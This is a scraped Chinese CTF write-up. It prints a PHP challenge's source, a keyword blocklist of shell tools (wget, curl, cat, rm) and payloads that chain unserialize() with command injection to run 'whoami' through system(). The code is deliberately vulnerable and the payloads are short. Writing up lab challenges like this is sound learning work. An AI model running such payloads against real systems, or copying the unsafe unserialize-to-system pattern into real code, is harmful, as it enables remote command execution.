很久沒有玩過ctf了 搞一搞
先貼源碼php
index.phpwindows
<?php
error_reporting(0);
include 'class.php';
include 'waf.php';
if(@$_GET['file']){
$file = $_GET['file'];
waf($file);
}else{
$file = "Welcome";
}
if($_GET['id'] === '1'){
include 'welcome/nothing.php';
die();
}
$secret = $_GET['secret'];
$ad = $_GET['ad'];
if(isset($ad)){
if(ereg("^[a-zA-Z0-9]+$", $ad) === FALSE)
{
echo '<script>alert("Sorry ! Again !")</script>';
}
elseif(strpos($ad, '--') !== FALSE)
{
echo "Ok Evrything will be fine!<br ><br >";
if (stripos($secret, './') > 0) {
die();
}
unserialize($secret);
}
else
{
echo '<script>alert("Sorry ! You must have --")</script>';
}
}
?>
<?php
if($file == "Welcome"){
require_once 'welcome/welcome.php';
}else{
if(!file_exists("./import/$file.php")){
die("The file does not exit !");
}elseif(!system("php ./import/$file.php")){
die('Something was wrong ! But it is ok! ignore it :)');
}
}
?>
waf.phpless
<?php
error_reporting(0);
function waf($values){
//$black = [];
$black = array('vi','awk','-','sed','comm','diff','grep','cp','mv','nl','less','od','cat','head','tail','more','tac','rm','ls','tailf',' ','%','%0a','%0d','%00','ls','echo','ps','>','<','${IFS}','ifconfig','mkdir','cp','chmod','wget','curl','http','www','`','printf');
foreach ($black as $key => $value) {
if(stripos($values,$value)){
die("Attack!");
}
if (!ctype_alnum($values)) {
die("Attack!");
}
}
}
?>
class.phpcurl
<?php
error_reporting(0);
class Record{
public $file="Welcome";
public function __construct($file)
{
$this->file = $file;
}
public function __sleep()
{
$this->file = 'sleep.txt';
return array('file');
}
public function __wakeup()
{
$this->file = 'wakeup.txt';
}
public function __destruct()
{
if ($this->file != 'wakeup.txt' && $this->file != 'sleep.txt' && $this->file != 'Welcome') {
system("$this->file");
}else{
echo "<?php Something destroyed ?>";
}
}
}
其實這題就是考察的基礎命令注入和基礎反序列化ide
首先咱們看到class.php裏面system函數函數
顯然出題人是想讓咱們從這裏突破 這裏用到windows的&命令 前一個命令正確繼續執行下一個命令 ui
咱們能夠構造payloadthis
flag.php&whoami&
好的觸發點咱們看完了 接下來看如何觸發url
觸發payloadblog
http://www.zhong.com/ctf/index.php?ad[]=1Aa)--&file=Welcome&secret=O:6:"Record":2:{s:4:"file";s:6:"whoami";}
其實就是考察幾個php函數的漏洞和復現一下反序列化。。。
相關文章
- 1. 隨筆,很久沒有上本身BLOG了,也很久沒有來CSDN了
- 2. 很久沒寫Blog了
- 3. 很久沒來了!
- 4. 很久沒來了
- 5. 很久沒寫了。
- 6. 很久沒寫了。又回來了
- 7. 很久沒有寫博客了
- 8. 很久沒有來寫博客了
- 9. 很久沒來看看了~
- 10. 很久沒寫博客了
- 更多相關文章...
- • 一對一關聯查詢 - MyBatis教程
- • Rust 所有權 - RUST 教程
- • IDEA下SpringBoot工程配置文件沒有提示
- • RxJava操作符(一)Creating Observables
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 安裝cuda+cuDNN
- 2. GitHub的使用說明
- 3. phpDocumentor使用教程【安裝PHPDocumentor】
- 4. yarn run build報錯Component is not found in path 「npm/taro-ui/dist/weapp/components/rate/index「
- 5. 精講Haproxy搭建Web集羣
- 6. 安全測試基礎之MySQL
- 7. C/C++編程筆記:C語言中的複雜聲明分析,用實例帶你完全讀懂
- 8. Python3教程(1)----搭建Python環境
- 9. 李宏毅機器學習課程筆記2:Classification、Logistic Regression、Brief Introduction of Deep Learning
- 10. 阿里雲ECS配置速記
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 隨筆,很久沒有上本身BLOG了,也很久沒有來CSDN了
- 2. 很久沒寫Blog了
- 3. 很久沒來了!
- 4. 很久沒來了
- 5. 很久沒寫了。
- 6. 很久沒寫了。又回來了
- 7. 很久沒有寫博客了
- 8. 很久沒有來寫博客了
- 9. 很久沒來看看了~
- 10. 很久沒寫博客了